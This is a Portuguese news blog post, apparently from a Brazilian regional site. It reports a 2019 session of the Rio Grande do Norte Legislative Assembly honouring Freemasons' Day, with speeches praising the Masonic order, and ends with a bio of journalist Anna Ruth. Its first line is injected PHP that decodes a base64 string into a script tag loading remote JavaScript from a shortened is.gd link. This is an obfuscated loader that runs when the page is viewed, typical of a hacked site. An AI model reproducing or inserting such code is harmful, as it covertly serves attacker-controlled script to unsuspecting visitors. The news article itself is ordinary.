$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Assembleia Legislativa realiza sessão solene em homenagem ao Dia do Maçom

Assembleia Legislativa realiza sessão solene em homenagem ao Dia do Maçom
21 Ago 2019

Ontem, no Plenário Clóvis Motta, o Legislativo Estadual promoveu solenidade para celebrar o Dia do Maçom. Proposta pelo deputado Kelps Lima (Solidariedade), a homenagem enalteceu os membros e valores da Maçonaria, que estão distribuídos por todos os setores da sociedade potiguar.

Discursando em nome dos homenageados, o maçom Roberto Pinto destacou a importância dos membros da instituição nas comunidades em que atuam. “O maçom atua constantemente na sociedade a que pertence, de diferentes formas. Sendo de origens variadas, nós permeamos todos os setores da sociedade, seja no serviço público ou na iniciativa privada”, detalhou.

A respeito dos compromissos assumidos diante da entidade, ele explicou que os maçons têm o dever de participar das iniciativas de interesse geral. “Como maçons, temos a obrigação moral – assumida por juramento – de influenciar positivamente o meio em que vivemos, de todas as formas, individualmente ou de forma coletiva”, disse.

Ainda de acordo com Roberto Pinto, “a Maçonaria tem o objetivo de tornar feliz a humanidade, exigindo de seus membros reputação moral, cívica, social e familiar. É uma instituição que prega o amor a Deus, à pátria, à família e à humanidade. Os maçons precisam obedecer às leis do seu país, levar uma vida honrada, praticar a justiça e o amor ao próximo, além de possuir trabalho honesto e digno”, esclareceu.

Também membro da Maçonaria, o parlamentar Kelps Lima elogiou a entidade, seus valores e todos os seus representantes. O deputado falou da importância da instituição nos momentos decisivos do Brasil, ao longo da sua história, lembrando que ela nunca se omitiu sempre que o país precisou.

“A Maçonaria pode e deve ser um farol para todos nós nesse momento de tantas divergências. Ela pode e deve ter um papel crucial nesse momento do Brasil, porque precisamos de pessoas de bem, sensatas, que entendam a importância das instituições democráticas brasileiras e que farão o país dar a virada que precisa”, avaliou.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *